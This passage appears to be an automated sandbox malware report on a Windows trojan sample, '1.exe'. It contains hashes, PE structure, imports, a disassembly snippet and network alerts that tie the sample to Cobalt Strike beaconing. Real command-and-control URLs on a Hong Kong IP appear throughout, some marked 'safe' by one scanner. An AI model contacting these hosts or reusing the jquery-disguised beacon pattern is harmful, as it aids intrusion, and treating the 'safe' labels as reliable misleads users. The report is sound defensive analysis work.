                        https://45.116.78.127/M1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsB_F1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/E1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsiU1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/1.exe, 00000000.00000003.2298925896.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsiO1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/P1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://45.116.78.127/R1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3254523170.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://45.116.78.127/jquery-3.3.1.min.jsiC1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://45.116.78.127/i1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://45.116.78.127/jquery-3.3.1.min.jsR3-1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://45.116.78.127/jquery-3.3.1.min.jsy1.exe, 00000000.00000003.2450808261.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://45.116.78.127/l1.exe, 00000000.00000003.2298925896.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://45.116.78.127/rovider1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://45.116.78.127/jquery-3.3.1.min.js/=1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://45.116.78.127/e1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://45.116.78.127/jquery-3.3.1.min.jsyptography1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                45.116.78.127
                                unknownHong Kong
                                55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1583283
                                Start date and time:2025-01-02 10:33:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 14s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:4
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:1.exe
                                Detection:MAL
                                Classification:mal100.troj.winEXE@1/1@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 88%
                                • Number of executed functions: 14
                                • Number of non-executed functions: 53
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                No simulations
                                No context
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDIE-AS-APCloudieLimitedHKHilix.ppc.elfGet hashmaliciousMiraiBrowse
                                • 43.240.13.118
                                loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                • 122.10.88.88
                                loligang.x86.elfGet hashmaliciousMiraiBrowse
                                • 103.215.93.239
                                nshmips.elfGet hashmaliciousMiraiBrowse
                                • 103.215.93.80
                                JEtXXZfgJc5bFQw_-twqRQGet hashmaliciousConnectBackBrowse
                                • 103.244.89.124
                                QMpaV1OK1w.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                • 103.96.75.36
                                file.exeGet hashmaliciousGhostRat, MimikatzBrowse
                                • 202.181.25.108
                                file.exeGet hashmaliciousUnknownBrowse
                                • 202.181.25.108
                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                • 45.192.33.233
                                botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                • 122.10.88.94
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                51c64c77e60f3980eea90869b68c58a8test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                • 45.116.78.127
                                A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                • 45.116.78.127
                                EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                • 45.116.78.127
                                WindowsUpdate.exeGet hashmaliciousUnknownBrowse
                                • 45.116.78.127
                                No context
                                Process:C:\Users\user\Desktop\1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):265737
                                Entropy (8bit):7.574074995457399
                                Encrypted:false
                                SSDEEP:3072:XgGBm36hbPChTWjQWvWLGNkPd1Pt0PaQti4RVxFrqi/BAQuOYqEqCGy5IN:wd6hO1WMWvOGNKXd47PdYqEqCGy5IN
                                MD5:844488F5A671540E8D6D8B3F89B3D273
                                SHA1:93378D999C19D1B8AD8C39A6CA4E4F277183FB5A
                                SHA-256:08F463716E035F7739876AFC20557C4ACC5DB12E29D1CBAB525EF40B652EE7D3
                                SHA-512:4B88D039458719DC4FB979FEA7B5BD2BF928FE6A1B70D41D4A5226592B65247F32F6F7A03D04F4FD55A5788B44B1E7E1906FBBAD33246589755B94AE35B90C26
                                Malicious:false
                                Reputation:low
                                Preview:.V....l.....oX.....c....QK_e..._.....I...9...I.O.F.=.._.?._=.....B.=.......}r{I..,(..p....D....Z.7..%l..^&.AX`.<....y7..w.`.... ....5....[1^w..PtU1X..^a>..:S.u}f..e#.l...S...T..]..!...~.m[.Y!}...[._A+!..A,./[.1m.e.C-...r.:.......P...^[.\.!....=iz...x.\......p...4).@.=.D...B.=.......=.....B.......R.=.....B.=.....B.=.....b.=.....B.=..w..B.=.....R.=.....B.=.....R.=......=.......=_......=i....B.=......=.....B.=......=.....B.=.....B.=.....B.=.....B.=....f.=}....B.=......=M....B.=.....B.=.....B.=....+.)..?....=.......=.....B.=.....B.=-..y+.(..^....=.,....=.@...B.=.....B.=M..Y+.-..?.....=.,...d.=.J...B.=.....B.=M...+.(..^...b.=.L...`.=. ...B.=.....B.=M..Y+.)..\...M.=.....R.=.....B.=.....B.=M..[.Yst.5.-Qp....H{..".@?....CA.#,i.PN^..l.._.j..$0.w?9.Zy..V..2...1an..D..${6q.H............SB]...oq.),.0./p.GXr.-.:.{.B...#...,X...Hv..H...zQ|....{*A...&X.E.-..o.k..X..MR...lM,.....S.....bD....W..."^SKo...C..w$xw.3..O..;f.i....}.}~./...........\t..k.M....p(........X.FG.T..F.
                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                Entropy (8bit):6.371945169519287
                                TrID:
                                • Win64 Executable (generic) (12005/4) 74.95%
                                • Generic Win/DOS Executable (2004/3) 12.51%
                                • DOS Executable Generic (2002/1) 12.50%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                File name:1.exe
                                File size:526'848 bytes
                                MD5:9afad044f9ff1201826fb08e602d3e1d
                                SHA1:e10ffb85d9252ae4067708553ec07141b85e8d58
                                SHA256:d2f3bf1f985fdd93088380843143d235c55b7188b99d7e728a1c49f8cbeb0a9e
                                SHA512:2f02f51d009539b1ba39f563461652bdce99f45ca89f78c61e12d110f8641f4bbc8cf5d348c10ed2c2fc0f35c48d1a821893b301511d5b3f55d1cee5bbdb1ed5
                                SSDEEP:6144:DShCXd6hO1WMWvOGNKXd47PdYqEqCGy5IxH/vmvBn9XF:BN6o1WxvOyH7PdYqEqbgI5/voxF
                                TLSH:03B48B024352687DE1179D35E2F2F4FC3861DC58E8F399C78A937E99BB39A4653000AB
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...f.&f...............).r.....................@.....................................2....`... ............................
                                Icon Hash:1f346261d84c6712
                                Entrypoint:0x1400013d0
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6626E166 [Mon Apr 22 22:15:02 2024 UTC]
                                TLS Callbacks:0x40001b70, 0x1, 0x40001b40, 0x1
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:d6e5bae1c8b524150e56169bc0241790
                                Instruction
                                dec eax
                                sub esp, 28h
                                dec eax
                                mov eax, dword ptr [000543E5h]
                                mov dword ptr [eax], 00000001h
                                call 00007FCA4C81F01Fh
                                nop
                                nop
                                dec eax
                                add esp, 28h
                                ret
                                nop dword ptr [eax]
                                dec eax
                                sub esp, 28h
                                dec eax
                                mov eax, dword ptr [000543C5h]
                                mov dword ptr [eax], 00000000h
                                call 00007FCA4C81EFFFh
                                nop
                                nop
                                dec eax
                                add esp, 28h
                                ret
                                nop dword ptr [eax]
                                dec eax
                                sub esp, 28h
                                call 00007FCA4C825D94h
                                dec eax
                                cmp eax, 01h
                                sbb eax, eax
                                dec eax
                                add esp, 28h
                                ret
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                dec eax
                                lea ecx, dword ptr [00000009h]
                                jmp 00007FCA4C81F259h
                                nop dword ptr [eax+00h]
                                ret
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                push ebx
                                dec eax
                                sub esp, 20h
                                dec eax
                                mov eax, dword ptr [00000020h]
                                dec eax
                                mov eax, dword ptr [eax]
                                mov ebx, dword ptr [eax]
                                call dword ptr [00057E3Fh]
                                dec eax
                                mov ecx, eax
                                mov edx, ebx
                                call dword ptr [00057EE4h]
                                dec eax
                                mov ecx, dword ptr [00056BCDh]
                                dec eax
                                add esp, 20h
                                pop ebx
                                dec eax
                                jmp dword ptr [00057EB1h]
                                push ebx
                                dec eax
                                sub esp, 20h
                                dec eax
                                mov ebx, ecx
                                call dword ptr [00057E1Bh]
                                mov dword ptr [000000A5h], eax
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x590000x990.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x2a8f0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x560000x4e0.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x80.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x550800x28.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x592600x220.idata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x71380x7200a862a3159dd03ba874c09f8875653b15False0.5865885416666666data6.318653270923573IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data0x90000x4bcd00x4be00902c1d957aa07d9b4868bcc79abf54ecFalse0.572745057660626zlib compressed data7.054400837416238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x550000xe100x1000880e799edacf8a7a40eb6e596fa84a27False0.27197265625data4.375500397708199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .pdata0x560000x4e00x6005f87c73a15265ff27134c24e1f6ec14cFalse0.4420572916666667data3.9083658914282964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .xdata0x570000x4980x600534c1d4a7a003b6d28868cf2afd7036cFalse0.2682291666666667data3.691608001970335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .bss0x580000xc600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata0x590000x9900xa0031033ba972d920c39656978835d548e0False0.35data4.224022858761624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .CRT0x5a0000x600x2002ba86c405a5e7276b45875ad739ffbebFalse0.068359375data0.27950974526108024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0x5b0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x5c0000x2a8f00x2aa00c8f9680d2ba7f206bc377703a81f9228False0.23968452162756598data4.160698559536376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x870000x800x2007e4c3f671b8159e7c99c5a83bd6eb190False0.251953125data1.5593077198912917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x5c3880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.3817204301075269
                                RT_ICON0x5c6700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                                RT_ICON0x5c7980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.43443496801705755
                                RT_ICON0x5d6400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5875451263537906
                                RT_ICON0x5dee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.671242774566474
                                RT_ICON0x5e4500x3bf3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9913338111683065
                                RT_ICON0x620480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.09962439370637644
                                RT_ICON0x728700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.1279167542568846
                                RT_ICON0x7bd180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1831601322626358
                                RT_ICON0x7ff400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2337136929460581
                                RT_ICON0x824e80x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.26612426035502956
                                RT_ICON0x83f500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3320825515947467
                                RT_ICON0x84ff80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4209016393442623
                                RT_ICON0x859800x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.4994186046511628
                                RT_ICON0x860380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5709219858156028
                                RT_GROUP_ICON0x864a00xd8dataEnglishUnited States0.6296296296296297
                                RT_VERSION0x865780x374dataEnglishUnited States0.417420814479638
                                DLLImport
                                KERNEL32.dllCloseHandle, ConvertThreadToFiber, CreateFiber, CreateFileA, CreateMailslotA, CreateThread, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, GetCurrentProcess, GetCurrentThreadId, GetLastError, GetMailslotInfo, GetModuleHandleA, GetProcAddress, GetTickCount, HeapAlloc, HeapCreate, HeapReAlloc, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, ReadFile, SetUnhandledExceptionFilter, Sleep, SleepEx, SwitchToFiber, TlsGetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
                                msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memcpy, memset, signal, strerror, strlen, strncmp, vfprintf, wcslen
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2025-01-02T10:34:00.428365+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54970445.116.78.127443TCP
                                2025-01-02T10:34:01.092715+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54970445.116.78.127443TCP
                                2025-01-02T10:34:01.092715+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54970445.116.78.127443TCP
                                2025-01-02T10:34:01.092931+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549704TCP
                                2025-01-02T10:34:09.748404+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54970545.116.78.127443TCP
                                2025-01-02T10:34:10.434039+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54970545.116.78.127443TCP
                                2025-01-02T10:34:10.434039+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54970545.116.78.127443TCP
                                2025-01-02T10:34:10.436015+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549705TCP
                                2025-01-02T10:34:11.637389+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54970645.116.78.127443TCP
                                2025-01-02T10:34:12.343974+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54970645.116.78.127443TCP
                                2025-01-02T10:34:12.343974+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54970645.116.78.127443TCP
                                2025-01-02T10:34:12.344200+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549706TCP
                                2025-01-02T10:34:13.557834+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54970745.116.78.127443TCP
                                2025-01-02T10:34:14.238635+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54970745.116.78.127443TCP
                                2025-01-02T10:34:14.238635+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54970745.116.78.127443TCP
                                2025-01-02T10:34:14.239065+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549707TCP
                                2025-01-02T10:34:15.540284+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54970845.116.78.127443TCP
                                2025-01-02T10:34:16.239468+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54970845.116.78.127443TCP
                                2025-01-02T10:34:16.239468+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54970845.116.78.127443TCP
                                2025-01-02T10:34:16.239762+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549708TCP
                                2025-01-02T10:34:17.647622+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54971445.116.78.127443TCP
                                2025-01-02T10:34:18.316328+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54971445.116.78.127443TCP
                                2025-01-02T10:34:18.316328+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54971445.116.78.127443TCP
                                2025-01-02T10:34:18.324834+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549714TCP
                                2025-01-02T10:34:19.572535+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54971745.116.78.127443TCP
                                2025-01-02T10:34:20.255143+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54971745.116.78.127443TCP
                                2025-01-02T10:34:20.255143+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54971745.116.78.127443TCP
                                2025-01-02T10:34:20.256075+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549717TCP
                                2025-01-02T10:34:21.519447+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54972845.116.78.127443TCP
                                2025-01-02T10:34:22.192772+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54972845.116.78.127443TCP
                                2025-01-02T10:34:22.192772+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54972845.116.78.127443TCP
                                2025-01-02T10:34:22.193088+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549728TCP
                                2025-01-02T10:34:23.397687+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54973945.116.78.127443TCP
                                2025-01-02T10:34:24.107141+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54973945.116.78.127443TCP
                                2025-01-02T10:34:24.107141+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54973945.116.78.127443TCP
                                2025-01-02T10:34:24.112399+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549739TCP
                                2025-01-02T10:34:25.327733+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54975545.116.78.127443TCP
                                2025-01-02T10:34:26.034082+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54975545.116.78.127443TCP
                                2025-01-02T10:34:26.034082+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54975545.116.78.127443TCP
                                2025-01-02T10:34:26.034223+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549755TCP
